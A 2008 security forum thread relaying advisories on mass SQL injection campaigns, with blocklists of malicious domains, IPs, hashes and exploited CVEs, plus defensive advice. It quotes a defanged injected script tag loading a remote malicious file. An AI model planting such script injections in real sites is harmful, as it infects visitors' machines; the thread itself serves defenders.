Jump to content


Photo

Hundreds of thousands of SQL injections


  • Please log in to reply
69 replies to this topic

#1 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 22 April 2008 - 02:20 PM

FYI...

- http://securitylabs....lerts/3070.aspx
04.22.2008 - "...malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related... In the last few hours we have seen the number of compromised sites increase by a factor of ten. This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on hxxp ://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing. There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here*... It appears that same tool was used to orchestrate this attack too. When we first started tracking the use of this domain, the malicious JavaScript was still making use of hxxp ://www.nmida[removed].com/... Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search... The number of sites affected is in the hundreds of thousands..."
* http://isc.sans.org/...?n&storyid=4294
Last Updated: 2008-04-16 19:14:00 UTC

:ph34r: :ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#2 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 24 April 2008 - 02:54 PM

FYI...

Hundreds of thousands of SQL injections
- http://isc.sans.org/...ml?storyid=4331
Last Updated: 2008-04-24 19:36:50 UTC - "UPDATE.
It is recommend that you block access to hxxp :/www .nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.
1.js is the file they are currently injecting. That could change and has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.
The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address 61.188.39.214 and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowser...lendar.20080424
http://www.shadowser...lendar.20080313
They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".
The register covered it stating their search returned 173k injected results:
http://www.theregist...ass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.
Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-e...Q_23337211.html
Websense has good information on it here:
http://securitylabs....lerts/3070.aspx
We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/...ml?storyid=4139
http://isc.sans.org/...ml?storyid=4294 ..."

:grrr: :ph34r: :!:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#3 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 25 April 2008 - 09:54 AM

FYI... (DO NOT visit the the sites mentioned in the commentary as you are very likely to get infected - BLOCK them, but don't go there.)

- http://www.f-secure....s/00001427.html
April 24, 2008 - "...As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera. Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls... It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code. So far three different domains have been used to host the malicious content — nmidahena .com, aspder .com and nihaorr1 .com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them.
So what should you do?
- First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected.
- Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there.
- Third, block access to the sites above.
- Fourth, make sure the software you use is patched...
- Fifth, keep your antivirus solution up-to-date."

(Note: per http://www.shadowser...lendar.20080424 :
"...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones... it most likely won't take too long for others to catch on and possibly conducting even more nefarious activities. If your site has fallen victim to one of these attacks, it's not just important you remove the offending injections, but it's even more important you fix the SQL injection attack vector. If you do not, your website will continue to be vulnerable to similar or worse attacks.")

(...where the other factors enter in)
- http://preview.tinyurl.com/6c8bet - 04/24/2008 (Networkworld) - "... SQL injection attacks on Microsoft Internet Information Servers are leaving Web pages with malicious -iFrames- in them... Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag..."

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#4 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 26 April 2008 - 05:48 AM

For clarification:

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

>>> http://www.f-secure....s/00001427.html
April 24, 2008 - "...So far three different domains have been used to host the malicious content
— nmidahena .com*, aspder .com and nihaorr1 .com.
There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them..."

4.26.2008 - NOW
- http://centralops.ne...ainDossier.aspx
aspder .com ***
aliases
addresses 60.172.219.4
country: CN
-------------------
nihaorr1 .com ***
aliases
addresses 219.153.46.28
country: CN
-------------------
nmidahena .com *
Could not find an IP address for this domain name.
....................
* (Note: per http://www.shadowser...lendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones...)

:ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#5 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 07 May 2008 - 04:55 AM

FYI...

SQL Injection Worm on the Loose
- http://isc.sans.org/...ml?storyid=4393
Last Updated: 2008-05-07 05:12:53 UTC - "A loyal ISC reader... wrote in to point us at what looks to be a SQL Injection worm that is on the loose. From a quick google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier. Right now we can't speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites. It looks like the infection of user machines is by Real Player vulnerabilities that seem more or less detected pretty well. The details, the script source that is injected into webpages is hxxp ://winzipices .cn /#.js (where # is 1-5). This, in turn, points to a cooresponding asp page on the same server. (i.e. hxxp :// winzipices .cn/#.asp). This in turn points back to the exploits. Either from the cnzz .com domain or the 51 .la domain. The cnzz .com (hxxp ://s141 .cnzz .com) domain looks like it could be set up for single flux, but it's the same pool of IP address all the time right now. hxxp ://www .51 .la just points to 51la .ajiang .net which has a short TTL, but only one IP is serving it.
Fair warning, if you google this hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page. Proceed at your own risk.
UPDATE: We're also see this website serving up some attacks in connection with this SQL Worm
(hxxp ://bbs .jueduizuan .com)"

:ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#6 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 07 May 2008 - 12:52 PM

FYI...

New SQL Injection Attacks and New Malware: winzipices .cn
- http://www.shadowser...lendar.20080507
7 May 2008
"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC has also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations. It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here are different than the last few attacks. If your websites has been hacked or you are visiting a hacked website, you will find something like this in your HTML source in the page you visit:
"<script src=hxxp ://winzipices .cn/ 5.js></script>"
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn have hidden iframes...
Malware Binaries:
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
-winzipices.cn [60.191.239.229]
-61.188.38.158
-61.134.37.15
Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names."

:ph34r: :!: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#7 Abadi

Abadi

    Member

  • Full Member
  • Pip
  • 12 posts

Posted 07 May 2008 - 06:22 PM

Thanks for the post :)

#8 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 10 May 2008 - 02:38 AM

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

SQL injection continues
- http://www.f-secure....s/00001432.html
May 10, 2008 - "...The attacks have now started again, this time pointing to several different domains. During the last few days we've seen the same type of encoded SQL script as in the previous case being inserted into ASP/ASP.NET pages. The scripts point to the following domains:
yl18 .net
www .bluell .cn
www .kisswow .com .cn
www .ririwow .cn
winzipices .cn
All of the domains above are pointing to IP addresses in China. Just like last time the scripts try to use several exploits to infect the user's computer."

- http://blog.trendmic...es-compromised/
May 10, 2008 - "...some several thousands of Web sites try to recover from being hacked via SQL injection barely two days ago, in comes another massive attack on more than half a million Web sites. Advanced Threats Research Program Manager Ivan Macalintal found the malicious script JS_SMALL.QT injected into various Web sites believed to be either using poorly implemented phpBB, or are using older, exploitable versions of the said program... In true ZLOB fashion, this variant poses as a video codec installer... These types of Trojans are known for changing an affected system’s local DNS and Internet browser settings, thus making the system vulnerable for even more potential threats..."

:ph34r: :ph34r:

Edited by apluswebmaster, 10 May 2008 - 01:36 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#9 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 11 May 2008 - 07:46 PM

FYI...

Mass File Injection Attack
- http://isc.sans.org/...ml?storyid=4405
Last Updated: 2008-05-11 21:48:56 UTC - "We received a report... this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob. If you do a google search for these two URLs, you get about 400,000 sites that have a call to this Javascript file included in them now. The major portion of the sites seem to be running phpBB forum software.
If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites. Internal clients that have connected may need some cleanup work. Another preventive step would be to blacklist these two URLs.

hxxp ://free .hostpinoy .info /f.js
hxxp ://xprmn4u.info /f .js "

:grrr: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#10 freckling

freckling

    Member

  • New Member
  • Pip
  • 1 posts

Posted 12 May 2008 - 08:17 AM

The best advice I've found in protecting against SQL injection attacks is to always check and validate input. This includes automatically removing bad characters from input and parameterizing your input statements. There's a very good tutorial on basic security against SQL injections on http://www.microsoft...llosecureworld7

#11 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 13 May 2008 - 09:28 AM

FYI...

- http://www.techworld...amp;pagtype=all
13 May 2008- "..."This is an on-going campaign, with new domains [hosting the malware] popping up even this morning," said Paul Ferguson, a network architect with anti-virus vendor Trend Micro. "The domains are changing constantly." According to Ferguson, over half a million legitimate websites have been hacked by today's mass-scale attack, only the latest in a string that goes back to at least January. All of the sites, he confirmed, are running "phpBB", an open-source message forum manager... Visitors to a hacked site are redirected through a series of servers, some clearly compromised themselves, until the last in the chain is reached. That server then pings the PC for any one of several vulnerabilities, including bugs in both Internet Explorer and the RealPlayer media player. If any of the vulnerabilities are present, the PC is exploited and malware is downloaded to it..."
* http://preview.tinyurl.com/6f2uro
Apr 07, 2008 - "phpBB 3.0.1 released... critical bugs fixed..."

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#12 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 14 May 2008 - 04:11 AM

Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

SQL Injection Attacks Becoming More Intense
- http://www.f-secure....s/00001435.html
May 13, 2008 - "The mass SQL injection attacks... are increasing in number and we're seeing more domains being injected and used to host the attack files. We believe that there is now more than one group using a set of different automated tools to inject the code. Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:
www .wowgm1 .cn
www .killwow1 .cn
www .wowyeye .cn
vb008 .cn
9i5t .cn
computershello .cn
We've now seen other domains being used as well such as direct84 .com which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available*. The direct84 .com domain fast-fluxes to several different IPs in Europe, Israel and North America. The injected link eventually leads to a backdoor detected as Backdoor:W32/Agent.DAS. This is a good time to again mention that it's not a vulnerability in Microsoft IIS or Microsoft SQL that is used to make this happen. If you are an administrator of a website that is using ASP/ASP.NET, you should make sure that you sanitize all inputs before you allow it to access the database. There are many articles on how to do this such as this one**. You could also have a look at URLScan*** which provides an easy way to filter this particular attack based on the length of the QueryString."

* http://www.securewor...s/danmecasprox/
May 13, 2008 - "...the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts..."

** http://msdn.microsof...y/ms998271.aspx

*** http://www.microsoft...ls/urlscan.mspx

Also see: http://www.shadowser...lendar.20080513
May 13, 2008

...and: http://isc.sans.org/...ml?storyid=4418
Last Updated: 2008-05-14 00:31:33 UTC

:ph34r: :ph34r:

Edited by apluswebmaster, 14 May 2008 - 04:42 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#13 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 14 May 2008 - 12:56 PM

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Posted May 14, 2008, at 07:42 AM - "Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google). Note that these numbers decay with time. Some of these domains were injected long ago and have been cleaned. At their height, their numbers may have been larger.

www .nihaorr1 .com -468,000
free .hostpinoy .info -444,000
xprmn4u .info -369,000
www .nmidahena .com -140,000
winzipices .cn -75,000

www .aspder .com -62,000
www .11910 .net -47,000
bbs .jueduizuan .com -44,000
www .bluell .cn -44,000
www .2117966 .net -39,000

xvgaoke .cn -33,000
www .414151 .com -17,000
yl18 .net -15,000
www .kisswow .com .cn -13,000
c .uc8010 .com -9500

www .ririwow .cn -6000
www .killwow1 .cn -4000
www .wowgm1 .cn -3500
www .wowyeye .cn -2800
9i5t .cn -2500

computershello .cn -2300
b15 .3322 .org -1200
www .direct84 .com -1100
smeisp .cn -85
free .edivid .info -40
h28 .8800 .org -34

ucmal .com -30
usuc .us -13
www .wowgm2 .cn -8
www .adword72 .com -2

=> Posted May 14, 2008, at 07:42 AM.
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#14 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 19 May 2008 - 05:35 AM

FYI...

Mass SQL Injection Attack Targets Chinese Web Sites
- http://preview.tinyurl.com/5tmj3q
May 19, 2008 3:00 AM PDT (PC World) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan. First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP (Internet Protocol) addresses, said Wayne Huang, chief executive officer of Armorize Technologies, in Taipei. "The attack is ongoing,... even if they can't successfully insert malware, they're killing lots of Web sites right now, because they're just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim websites," Huang said... Technical details of the malware, including the specific browser vulnerabilities exploited, were not immediately available..."

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#15 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 19 May 2008 - 11:28 AM

More on the China/Taiwan SQL attacks...

- http://preview.tinyurl.com/56u2m7
May 19, 2008 (Computerworld) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites... The attackers in the more recent outbreak aren't targeting a specific vulnerability. Instead, they are using an automated SQL injection attack engine that is tailored to attack Web sites using SQL Server, Huang said. The attack uses SQL injection to infect targeted Web sites with malware, which in turn exploits vulnerabilities in the browsers of those who visit the Web sites, he said, calling the attack "very well designed." The malware injected by the attack comes from 1,000 different servers and targets 10 vulnerabilities in Internet Explorer and related plug-ins that are popular in Asia, Huang said.

The vulnerabilities are MS06-014 (CVE-2006-0003), MS07-017 (CVE-2007-1765), RealPlayer IERPCtl.IERPCtl.1 (CVE-2007-5601), GLCHAT.GLChatCtrl.1 (CVE-2007-5722), MPS.StormPlayer.1 (CVE-2007-4816), QvodInsert.QvodCtrl.1, DPClient.Vod (CVE-2007-6144), BaiduBar.Tool.1 (CVE-2007-4105), VML Exploit (CVE-2006-4868) and PPStream (CVE-2007-4748)."
- http://nvd.nist.gov/nvd.cfm

- http://blog.trendmic...end-compromise/
May 19, 2008

:eek: :ph34r:

Edited by apluswebmaster, 19 May 2008 - 12:03 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#16 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 19 May 2008 - 03:23 PM

Follow-up:

- http://www.computerw...8#comment-92914
[China and Taiwan - SQL injection attacks]
Submitted by Anonymous tech on May 19, 2008 - 16:11.
" 'Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites...'

That appears to be incorrect - the SQL injection plants a java-scripted IFRAME which re-directs the victim's browser to an attacker's site that performs the exploits. Please check the facts. More than one source would confirm it.

Every other SQL injection attack to date has done that, using an Mpack-like exploit tool at the attackers' site - NOT the site that was the victim of the SQL injection."

:!:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#17 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 23 May 2008 - 12:32 PM

APAC SQL attacks...

- http://blog.trendmic...h-other-shores/
May 19, 2008 - "...This discovery comes on the tail of the mass compromise* of APAC sites (China, Taiwan, Hong Kong, and Singapore). Curious is how some of the malicious URLs in this new set of compromises are the same as in the first mass compromise. The four sites — humanitarian, government, and news — were injected with the malicious JavaScript..."

Chinese Weekend Compromise
* http://blog.trendmic...end-compromise/
May 19, 2008 - "Just a week after half a million Web sites were compromised, here comes another mass Web threat... This time, Senior Threat Analyst Aries Hsieh, together with our research team in Taiwan, picked up on another script injection attack aimed at Web sites in the Chinese language... A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site hxxp ://{BLOCKED} .us /s.js

JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:
1. Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
2. Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
3. Checks for GLAVATAR.GLAvatarCtrl.1
4. Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
5. Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong. These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:
* hxxp ://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
* hxxp ://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
* hxxp ://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
* hxxp ://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
* hxxp ://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
* VBS_PSYME.CSZ
* JS_VEEMYFULL.AA
* JS_LIANZONG.E
* JS_SENGLOT.D
These four malware, in turn, download and execute
hxxp ://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag..."

(Screenshots available at both TrendMicro URLs above.)

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#18 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 23 May 2008 - 12:33 PM

Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/...ml?storyid=4439
Last Updated: 2008-05-20 16:55:25 UTC ...(Version: 3) - "...Shadowserver has published a list of domains used in past -and- recent massive SQL injections* that insert malicious javascript into websites. The list is just focused on mass SQL injection attacks... plans to maintain this list as we come across new domains over time. The list also contains an estimated number of current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource..."
* http://www.shadowser...lendar.20080514
Full list of Injected Sites ...last modified date/time at bottom of page

:!:

Edited by apluswebmaster, 23 May 2008 - 12:38 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#19 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 02 June 2008 - 05:21 AM

FYI...

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 01, 2008, at 09:04 PM
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google)...
Some of these have been re-injected by URL encoding the script names. So if a host/domain shows up in parentheses and also in the list unencoded, these were two separate injection runs..."

("Full list..." at the URL above.)

:grrr: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#20 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 02 June 2008 - 08:21 PM

FYI...

New sql injection site with fastflux hosting
- http://isc.sans.org/...ml?storyid=4519
Last Updated: 2008-06-02 22:13:22 UTC - "One of our frequent contributors notified us of a new sql injection site.
hxxp ://en-us18 .com /b.js is being injected via sql into websites.
When I googled for it I saw 560 injected webpages. “b.js injects an iFrame which points to
hxxp ://en-us18 .com/cgi-bin/index.cgi?ad which in turn embeds two Flash files:

advert.swf: http://www.virustota...46f82c536abd0c7
banner.swf: http://www.virustota...272625634a3babc

This appears to be fast fluxed or at least setup to change rapidly based on this dig output... A second dig a few minutes later produced similar but slightly different results. So this domain is changing. I guess they got tired of people blackholing their ip address. So in that case I would recommend you dns blackhole that domain."

:ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#21 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 06 June 2008 - 05:16 AM

And the list just keeps on growing...

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 05, 2008, at 07:10 AM
Page last modified on June 06, 2008, at 06:22 AM

:(

Edited by apluswebmaster, 06 June 2008 - 01:01 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#22 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 12 June 2008 - 02:06 AM

Ongoing growth... ugh.

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Page last modified on June 11, 2008, at 11:16 AM


:(
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#23 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 13 June 2008 - 11:36 AM

FYI...

SQL Injection: More of the same
- http://isc.sans.org/...ml?storyid=4565
Last Updated: 2008-06-13 16:13:57 UTC - "...How to defend against this?
The "simple" answer is of course to just not have any SQL injection faults. But that's easier said then done, in particular for an existing legacy application. A couple other things you can do:
* limit the database user the web application uses. Maybe it doesn't have to update anything, or only few tables
* Monitor your web application for SQL errors. These statements may create some errors if your web application doesn't have sufficient privileges
* keep a close eye on your data and your application. Look for new javascript in titles and other spots that shouldn't have any..."

(More detail at the ISC URL above.)

:ph34r:

Edited by apluswebmaster, 13 June 2008 - 11:37 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#24 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 18 June 2008 - 05:37 AM

FYI...

- http://preview.tinyurl.com/64qke6
June 17, 2008 (trustedsource.org/blog) - "MTV France has become another victim of the “Latest Wave of SQL Injection Attacks“. The web site and the RSS feed are heavily infected with several malicious scripts as seen in the screenshot... Each of the malicious domains are serving a script called ‘b.js’ which is related to the “Danmec” malware family (a.k.a. “Asprox”). These domains are hosted on a “fast-flux” network of compromised computers which could also relay spam messages... The biggest concern with the infected RSS feed is that every RSS reader or web site, including the content from MTV France, will host the malicious scripts on their web sites. In a quick test with a WordPress 2.1.3 installation, the full content (including the script) was included in the blog and not filtered out. This is one example of the threat posed by Web 2.0 content mash-ups, where someone is including generated content via feeds into his web site and thereby just spreading the malicious code further."

(Screenshots available at the URL above.)

:shock:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#25 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 25 June 2008 - 05:46 AM

FYI...

Microsoft SQL Injection Prevention Strategy
- http://www.spywarein...?...st&p=643245
2008-06-24

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
...last modified on June 25, 2008, at 05:17 AM

:!:

Edited by apluswebmaster, 25 June 2008 - 10:12 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#26 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 26 June 2008 - 05:46 PM

FYI...

- http://www.theregist...njection_tools/
26 June 2008 - "...ScanSafe, a company that monitors websites for malicious behavior, reports* a new wave of SQL-injection attacks that harnesses infected PCs to search out and attack vulnerable websites. Sites that are compromised, in turn, install backdoors on visitors' machines, creating a worm-like characteristic. The so-called Asprox attacks are distinct from a recent swarm of SQL attacks that over the past few months... The entry of Asprox suggests other malware gangs may be adopting the technique after seeing the success of their competitors..."
